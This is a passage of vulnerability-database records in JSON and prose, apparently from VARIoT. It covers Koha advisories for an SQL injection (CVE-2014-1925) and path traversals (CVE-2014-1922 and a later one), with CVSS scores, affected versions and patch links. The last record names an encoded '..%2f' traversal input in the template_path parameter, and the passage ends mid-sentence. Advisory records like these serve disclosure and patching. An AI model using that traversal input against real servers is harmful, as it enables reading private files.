        "trust": 1.0,
        "vendor": "koha",
        "version": "3.10.13"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.8.22"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.14.2"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.12.9"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.10.12"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.8.23"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.14.3"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.12.10"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.10.13"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1925"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Chris Cormack, Galen Charlton, and John Lightsey",
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2014-1925",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "PARTIAL",
            "baseScore": 7.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2014-1925",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2014-1925",
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2014-1925",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2014-1925",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "CVE-2014-1925",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202001-1093",
            "trust": 0.6,
            "value": "CRITICAL"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008838"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1093"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1925"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924. Koha contains an SQL injection vulnerability. Information may be obtained or tampered with, and a denial-of-service (DoS) condition may result. Koha is prone to the following security vulnerabilities:\n1. An arbitrary file-access vulnerability\n2. A directory-traversal vulnerability\n3. An arbitrary file-write vulnerability\n4. An SQL-injection vulnerability\nAn attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-1925"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008838"
      },
      {
        "db": "BID",
        "id": "65448"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-1925",
        "trust": 2.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2014/02/07/10",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2014/02/10/3",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008838",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1093",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "65448",
        "trust": 0.3
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008838"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1093"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1925"
      }
    ]
  },
  "id": "VAR-202001-1231",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.5804196
  },
  "last_update_date": "2024-11-23T22:16:40.034000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug\u00a011666 Koha",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
      },
      {
        "title": "Koha SQL Repair measures for injecting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=112804"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008838"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1093"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.0
      },
      {
        "problemtype": "SQL injection (CWE-89) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008838"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1925"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
      },
      {
        "trust": 1.9,
        "url": "http://koha-community.org/security-release-february-2014/"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1925"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
      },
      {
        "trust": 0.3,
        "url": "http://koha-community.org/"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008838"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1093"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1925"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008838"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1093"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1925"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-02-07T00:00:00",
        "db": "BID",
        "id": "65448"
      },
      {
        "date": "2020-02-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-008838"
      },
      {
        "date": "2020-01-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202001-1093"
      },
      {
        "date": "2020-01-24T17:15:12.407000",
        "db": "NVD",
        "id": "CVE-2014-1925"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-02-07T00:00:00",
        "db": "BID",
        "id": "65448"
      },
      {
        "date": "2020-02-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-008838"
      },
      {
        "date": "2021-01-04T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202001-1093"
      },
      {
        "date": "2024-11-21T02:05:17.213000",
        "db": "NVD",
        "id": "CVE-2014-1925"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "network",
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      }
    ],
    "trust": 0.3
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Koha\u00a0 In \u00a0SQL\u00a0 Injection vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008838"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SQL injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1093"
      }
    ],
    "trust": 0.6
  }
}

var-202001-1307
Vulnerability from variot

Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors. Koha contains a path traversal vulnerability. Information may be obtained. Koha is prone to the following security vulnerabilities: 1. An arbitrary file-access vulnerability 2. A directory-traversal vulnerability 3. An arbitrary file-write vulnerability 4. An SQL-injection vulnerability. An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks. (The numbered list is the aggregate text of BID 65448, which this record cites alongside NVD and JVNDB; the issue tracked here as CVE-2014-1922 is the path traversal in tools/pdfViewer.pl.)



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202001-1307",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.08.23"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.12.10"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.10.00"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.00"
      },
      {
        "model": "koha",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.12.00"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.14.03"
      },
      {
        "model": "koha",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "koha",
        "version": "3.10.13"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.8.22"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.14.2"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.12.9"
      },
      {
        "model": "library software community koha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.10.12"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.8.23"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.14.3"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.12.10"
      },
      {
        "model": "library software community koha",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "koha",
        "version": "3.10.13"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1922"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Chris Cormack, Galen Charlton, and John Lightsey",
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      }
    ],
    "trust": 0.3
  },
  "cve": "CVE-2014-1922",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 5.0,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 10.0,
            "id": "CVE-2014-1922",
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "severity": "MEDIUM",
            "trust": 1.8,
            "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "nvd@nist.gov",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "id": "CVE-2014-1922",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2014-1922",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2014-1922",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "CVE-2014-1922",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202001-1092",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008841"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1092"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1922"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors. Koha contains a path traversal vulnerability. Information may be obtained. Koha is prone to the following security vulnerabilities:\n1. An arbitrary file-access vulnerability\n2. A directory-traversal vulnerability\n3. An arbitrary file-write vulnerability\n4. An SQL-injection vulnerability\nAn attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks.",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-1922"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008841"
      },
      {
        "db": "BID",
        "id": "65448"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-1922",
        "trust": 2.7
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2014/02/07/10",
        "trust": 1.6
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2014/02/10/3",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008841",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1092",
        "trust": 0.6
      },
      {
        "db": "BID",
        "id": "65448",
        "trust": 0.3
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008841"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1092"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1922"
      }
    ]
  },
  "id": "VAR-202001-1307",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.5804196
  },
  "last_update_date": "2024-11-23T22:16:40.008000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Bug\u00a011660 Koha",
        "trust": 0.8,
        "url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
      },
      {
        "title": "Koha Repair measures for path traversal vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=112803"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008841"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1092"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.0
      },
      {
        "problemtype": "Path traversal (CWE-22) [NVD Evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008841"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1922"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
      },
      {
        "trust": 1.9,
        "url": "http://koha-community.org/security-release-february-2014/"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
      },
      {
        "trust": 1.6,
        "url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
      },
      {
        "trust": 1.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1922"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
      },
      {
        "trust": 0.3,
        "url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
      },
      {
        "trust": 0.3,
        "url": "http://koha-community.org/"
      }
    ],
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008841"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1092"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1922"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "BID",
        "id": "65448"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008841"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1092"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-1922"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-02-07T00:00:00",
        "db": "BID",
        "id": "65448"
      },
      {
        "date": "2020-02-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-008841"
      },
      {
        "date": "2020-01-24T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202001-1092"
      },
      {
        "date": "2020-01-24T17:15:12.173000",
        "db": "NVD",
        "id": "CVE-2014-1922"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2014-02-07T00:00:00",
        "db": "BID",
        "id": "65448"
      },
      {
        "date": "2020-02-13T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2014-008841"
      },
      {
        "date": "2021-01-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202001-1092"
      },
      {
        "date": "2024-11-21T02:05:16.780000",
        "db": "NVD",
        "id": "CVE-2014-1922"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "network",
    "sources": [
      {
        "db": "BID",
        "id": "65448"
      }
    ],
    "trust": 0.3
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Koha\u00a0 Vulnerabilities in path traversal",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-008841"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "path traversal",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202001-1092"
      }
    ],
    "trust": 0.6
  }
}

var-201810-0025
Vulnerability from variot

Multiple directory traversal vulnerabilities in Koha 3.14.x before 3.14.16, 3.16.x before 3.16.12, 3.18.x before 3.18.08, and 3.20.x before 3.20.1 allow remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the template_path parameter to (1) svc/virtualshelves/search or (2) svc/members/search. Koha contains a path traversal vulnerability. Information may be obtained. Koha is the first open source library automation system. Koha has a SQL injection vulnerability that allows an attacker to exploit a vulnerability to access or modify database data. Koha is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. Multiple directory-traversal vulnerabilities 3. Multiple HTML Injection vulnerabilities 4. Multiple cross-site scripting vulnerabilities 5. Multiple cross site request forgery vulnerabilities. An attacker may leverage these issues to access or modify data, exploit latent vulnerabilities in the underlying database, read arbitrary files, allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal 